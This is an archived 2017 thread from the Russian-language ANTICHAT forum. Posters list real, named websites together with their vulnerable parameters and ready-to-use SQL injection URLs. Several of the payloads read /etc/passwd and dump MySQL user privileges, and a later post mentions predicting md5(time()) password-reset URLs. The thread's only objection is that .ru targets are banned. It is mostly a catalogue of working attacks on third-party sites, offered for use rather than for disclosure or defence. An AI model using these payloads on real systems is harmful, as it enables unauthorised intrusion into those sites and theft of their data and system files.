ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

22.05.2017, 20:27
|
|
Guest
Сообщений: n/a
Провел на форуме: 14926
Репутация:
17
|
|
SQLi с чтением файла из файловой системы и file_priv Y
Сайт:eohu.ca
Уязвимый параметор: newsID через GET
root:Y,root:Y,root:Y,debian-sys-maint:Y,phpmyadmin:N,root:Y
root@localhost:5.1.49-1ubuntu8:debian-linux-gnu:x86_64
Эксплоит:
Код:
Code:
http://www.eohu.ca/news/view_news_e.php?newsID=-1' union all select group_concat(user,0x3a,file_priv),user(),load_file('/etc/passwd') from mysql.user --+
|
|
|
|

24.05.2017, 16:13
|
|
Guest
Сообщений: n/a
Провел на форуме: 14926
Репутация:
17
|
|
SQLi с чтением файла из файловой системы
Сайт:bbgv.org
Уязвимый параметор: cat_id через GET
root:Y,root:Y,root:Y,:N,:N,bbgv_web:N,bbgv_bk:N
root@localhost:5.1.73:redhat-linux-gnu:x86_64
Эксплоит:
Код:
Code:
view-source:http://bbgv.org/bbgv-events/events.html?cat_id=-1 union all select 1,2,3,group_concat(user,0x3a,file_priv),5,6,7,8,9,10,user(),12,13,14,15,load_file('/etc/passwd'),17,18,19,20,21,22,23,24,25,26 from mysql.user --+
|
|
|
|

25.05.2017, 17:14
|
|
Guest
Сообщений: n/a
Провел на форуме: 14926
Репутация:
17
|
|
Сайт:salut.ru ТИЦ 475
SQLi Error base черз GET, уязвимый параметр SectionId
salut@localhost:5.1.67-0ubuntu0.10.04.1:debian-linux-gnu:x86_64:/usr/
Эксплоит:
Код:
Code:
http://salut.ru/Section.php?SectionId=18' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select @@version),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) --+
Сайт:irbis-opt.ru ТИЦ 20 Всякие палатки и спортивная снаряга
SQLi черз GET, уязвимый параметр idd
nordsportspb@81.177.141.127:10.1.22-MariaDB:Linux:x86_64:/usr
Эксплоит:
Код:
Code:
http://www.irbis-opt.ru/catalog.php?idd=-12' union all select @@version --+
Сайт:economic-study.ru ТИЦ 10 Вузы Москвы
SQLi черз GET, уязвимый параметр ID
vsevedpr_econom@localhost:5.5.52-38.3:vsevedpr_econom:debian-linux-gnu:x86_64:/usr
Эксплоит:
Код:
Code:
http://economic-study.ru/ManagerDetails.php?LID=1&ID=-1 union all select 1,2,3,user(),@@version,database(),@@version_compile_os,@@version_compile_machine,@@basedir,10 --+
|
|
|
|

25.05.2017, 18:02
|
|
Guest
Сообщений: n/a
Провел на форуме: 97114
Репутация:
24
|
|
Сообщение от Печа
Печа said:
↑
Сайт:salut.ru
ТИЦ 475
SQLi Error base черз GET, уязвимый параметр SectionId
salut@localhost:5.1.67-0ubuntu0.10.04.1:debian-linux-gnu:x86_64:/usr/
Эксплоит:
Код:
Code:
http://salut.ru/Section.php?SectionId=18' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select @@version),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) --+
Сайт:irbis-opt.ru
ТИЦ 20
Всякие палатки и спортивная снаряга
SQLi черз GET, уязвимый параметр idd
nordsportspb@81.177.141.127:10.1.22-MariaDB:Linux:x86_64:/usr
Эксплоит:
Код:
Code:
http://www.irbis-opt.ru/catalog.php?idd=-12' union all select @@version --+
Сайт:economic-study.ru
ТИЦ 10
Вузы Москвы
SQLi черз GET, уязвимый параметр ID
vsevedpr_econom@localhost:5.5.52-38.3:vsevedpr_econom:debian-linux-gnu:x86_64:/usr
Эксплоит:
Код:
Code:
http://economic-study.ru/ManagerDetails.php?LID=1&ID=-1 union all select 1,2,3,user(),@@version,database(),@@version_compile_os,@@version_compile_machine,@@basedir,10 --+
.ru саиты запрещены
|
|
|
|

25.05.2017, 18:26
|
|
Guest
Сообщений: n/a
Провел на форуме: 14926
Репутация:
17
|
|
Сообщение от Octavian
Octavian said:
↑
.ru саиты запрещены
Я когда форум просматривал, посты с .ru часто попадались, или это новые правила?
Если админы скажут не вопрос, удалю свой пост.
Да и софтом я в .ru не лазил, искал через дорки и крутил руками
|
|
|
|

26.05.2017, 14:41
|
|
Guest
Сообщений: n/a
Провел на форуме: 14926
Репутация:
17
|
|
Сайт:ene.com.tw
SQLi черз GET с чтением файла из файловой системы, уязвимый параметр pid
root:Y,root:Y,root:Y,:N,:N,enemysql:N,enemysql:Y.
enemysql@localhost:5.1.73:redhat-linux-gnu:x86_64:/var/log/mysqld.log.
Эксплоит:
Код:
Code:
http://www.ene.com.tw/english/ir/newsdetail.php?fid=14&pid=-1' union all select 1,2,3,group_concat(user,0x3a,file_priv),5,@@version,load_file('/etc/passwd'),8,9,10 from mysql.user --+
|
|
|
|

27.05.2017, 23:08
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
|
|
|
|

11.06.2017, 14:54
|
|
Guest
Сообщений: n/a
Провел на форуме: 97114
Репутация:
24
|
|
Предугадываем URL восстановление пароля md5(time())
|
|
|
|

24.07.2017, 13:28
|
|
Guest
Сообщений: n/a
Провел на форуме: 1526
Репутация:
0
|
|
|
|
|
|

30.09.2017, 22:34
|
|
Guest
Сообщений: n/a
Провел на форуме: 238
Репутация:
0
|
|
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|